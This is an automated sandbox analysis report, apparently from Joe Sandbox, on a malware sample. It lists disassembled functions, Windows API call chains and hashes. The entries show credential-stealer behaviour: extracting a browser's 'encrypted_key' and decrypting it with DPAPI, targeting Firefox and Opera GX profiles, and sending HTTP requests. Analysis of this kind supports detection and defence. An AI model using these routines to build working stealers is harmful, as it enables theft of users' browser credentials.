                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                                              • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                              • API String ID: 161838763-3310892237
                                                                                                                                                                                                              • Opcode ID: f5148b0d705efd75e2e10b5abe61f2bbec5188093012e619b38a051b17fd4cfa
                                                                                                                                                                                                              • Instruction ID: 4ea3e6aee9535a9ba751093332b8a7b39d3e3dd60563e08460ae1e8eb0b09363
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5148b0d705efd75e2e10b5abe61f2bbec5188093012e619b38a051b17fd4cfa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B41D83690012D9BCF11FFA5EE46ADDB7B4AF84304F414120FD44B316AEA24AE498F91
                                                                                                                                                                                                              Function 0092819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                                • Part of subcall function 00931DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00936973,?), ref: 00931E0C
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0092CC65,?,?), ref: 009281E5
                                                                                                                                                                                                                • Part of subcall function 00928048: CryptStringToBinaryA.CRYPT32(00926724,00000000,00000001,00000000,?,00000000,00000000), ref: 00928060
                                                                                                                                                                                                                • Part of subcall function 00928048: LocalAlloc.KERNEL32(00000040,?,?,?,00926724,?), ref: 0092806E
                                                                                                                                                                                                                • Part of subcall function 00928048: CryptStringToBinaryA.CRYPT32(00926724,00000000,00000001,00000000,?,00000000,00000000), ref: 00928084
                                                                                                                                                                                                                • Part of subcall function 00928048: LocalFree.KERNEL32(?,?,?,00926724,?), ref: 00928093
                                                                                                                                                                                                                • Part of subcall function 009280A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0092823B), ref: 009280C4
                                                                                                                                                                                                                • Part of subcall function 009280A1: LocalAlloc.KERNEL32(00000040,0092823B,?,?,0092823B,0092CB6A,?,?,?,?,?,?,?,0092CC65,?,?), ref: 009280D8
                                                                                                                                                                                                                • Part of subcall function 009280A1: LocalFree.KERNEL32(0092CB6A,?,?,0092823B,0092CB6A,?,?,?,?,?,?,?,0092CC65,?,?), ref: 009280FD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                                              • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                                                              • API String ID: 2311102621-738592651
                                                                                                                                                                                                              • Opcode ID: 1d1d6295f70b3aad63fa5759248d3e658b6fad1661cda2c198a415bf450c509b
                                                                                                                                                                                                              • Instruction ID: 163ed7e9b94d6130142a4d7ccc0a502b6d0f2ada3555416a250aee8b4585c646
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d1d6295f70b3aad63fa5759248d3e658b6fad1661cda2c198a415bf450c509b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5521D432E4561AEBCF14EBA0FC41ADEB778EF813A0F104565E920A7195DF34AA49CB50
                                                                                                                                                                                                              Function 00936880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00926963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 009269C5
                                                                                                                                                                                                                • Part of subcall function 00926963: StrCmpCA.SHLWAPI(?), ref: 009269DF
                                                                                                                                                                                                                • Part of subcall function 00926963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00926A0E
                                                                                                                                                                                                                • Part of subcall function 00926963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00926A4D
                                                                                                                                                                                                                • Part of subcall function 00926963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00926A7D
                                                                                                                                                                                                                • Part of subcall function 00926963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00926A88
                                                                                                                                                                                                                • Part of subcall function 00926963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00926AAC
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 009368B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                              • String ID: ERROR$ERROR
                                                                                                                                                                                                              • API String ID: 3086566538-2579291623
                                                                                                                                                                                                              • Opcode ID: 6aaa80f83d296a74a4108f93a392fa4f967e8164ee1c4947cd5ea93fbc4dbb26
                                                                                                                                                                                                              • Instruction ID: 2406bba4e71aae10b7cdb48a6dccc46a58316d6ce32965f9f74f4e9375a61d79
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6aaa80f83d296a74a4108f93a392fa4f967e8164ee1c4947cd5ea93fbc4dbb26
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89016239A00128ABCB21FB75EC47B8D37A85FD4300F504261BD64E326BEB24EA458BD1
                                                                                                                                                                                                              Function 009283DE Relevance: 4.6, APIs: 3, Instructions: 87libraryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(00B7EF20,0000FFFF,?,?,?,?,?,?,?,?,?,?,0092DADF), ref: 009283F7
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrlenA.KERNEL32(?,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930524
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrcpyA.KERNEL32(00000000,00000000,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930556
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(?,00957194,00B7EF20,0095674E,?,?,?,?,?,?,?,?,0092DADF), ref: 0092844C
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0092DADF), ref: 00928460
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2929475105-0
                                                                                                                                                                                                              • Opcode ID: ebd6c76997a8ecbcede0647beb465491eda43d5d41db13426d23c3c54155370f
                                                                                                                                                                                                              • Instruction ID: 61e0384c89f1350704593c2083b650246a5176e05ede2d752c304cd3eb8c360c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebd6c76997a8ecbcede0647beb465491eda43d5d41db13426d23c3c54155370f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD314A31904524ABCB12AF69FD03A6EBBB4AF88700B5041A1F528B7539DF319A81CF81
                                                                                                                                                                                                              Function 00937023 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?), ref: 0093708A
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4198075804-0
                                                                                                                                                                                                              • Opcode ID: fcf3cc0ceb48ba8c5ba692c69979a5e66205f56f210b82d5cd67fcd247f77b9e
                                                                                                                                                                                                              • Instruction ID: a7debf5cd070c3a7ba9e2259ec63d2d6b349a9a578889299343c9f51e4980c32
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcf3cc0ceb48ba8c5ba692c69979a5e66205f56f210b82d5cd67fcd247f77b9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7321397280021DABCB10EFA5E886ADE7BB8FF84314F104025F905B7161DB34AA86CF90
                                                                                                                                                                                                              Function 0093241B Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00934ACD), ref: 00932435
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00934ACD,00934ACD,00000000,?,?,?,00934ACD), ref: 0093245C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00934ACD), ref: 00932473
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1065093856-0
                                                                                                                                                                                                              • Opcode ID: 9fbdc659eff3494682d1d1ca666592f72de249d121d06302259a717f7fcaab60
                                                                                                                                                                                                              • Instruction ID: 895f84a5013978e3f81af214db67b0ec1e285eb414c27c3f2d5150f378b2fde6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fbdc659eff3494682d1d1ca666592f72de249d121d06302259a717f7fcaab60
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DF0B475101118BFEB016F64EC8AFEB3B5CEF15394F004160F965971B1D720DD815BA1
                                                                                                                                                                                                              Function 0093221F Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00933E2A,00000000,?), ref: 00932241
                                                                                                                                                                                                              • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0093225C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00932263
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3183270410-0
                                                                                                                                                                                                              • Opcode ID: 0bcbb74434b8c068ede75916ca1547c150eb20aae522a7fb889d96a0dad20f8c
                                                                                                                                                                                                              • Instruction ID: 5e2c5883c6ea2ac6f2363a8d5f571c052aae4e4f3e2a24662a5f52e2d282af37
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bcbb74434b8c068ede75916ca1547c150eb20aae522a7fb889d96a0dad20f8c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97F05475604208ABE711AB69DC45FEEB7BC9F88700F0000A9F655DB190DEB4D9858B95
                                                                                                                                                                                                              Function 00930C5A Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00921385), ref: 00930C66
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00921385), ref: 00930C6D
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,00921385), ref: 00930C81
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocateComputerNameProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1664310425-0
                                                                                                                                                                                                              • Opcode ID: 04503714c4dbcbc256cca689172075e3b43319f1dd307b7b9fdf34bea912e313
                                                                                                                                                                                                              • Instruction ID: e9a76b3c6ffb268f6badf5049d9a4673ba99f1e97d82323350c7eff44e120be7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04503714c4dbcbc256cca689172075e3b43319f1dd307b7b9fdf34bea912e313
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BE08CB1204304ABD7408BAA9C0DF9E7BACEBC0712F000024FA45D3190E6B0C948D720
                                                                                                                                                                                                              Function 0092C931 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera GX,0095684E,0095684B,?,?,?), ref: 0092C964
                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00931D67: GetFileAttributesA.KERNEL32(?,?,?,0092DA54,?,?,?), ref: 00931D6E
                                                                                                                                                                                                                • Part of subcall function 0092819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0092CC65,?,?), ref: 009281E5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                                                                                                              • String ID: Opera GX
                                                                                                                                                                                                              • API String ID: 1719890681-3280151751
                                                                                                                                                                                                              • Opcode ID: d314b1bb62d002f64a310dae09a89404a44ca071c875ad9a0886fcf5568eb661
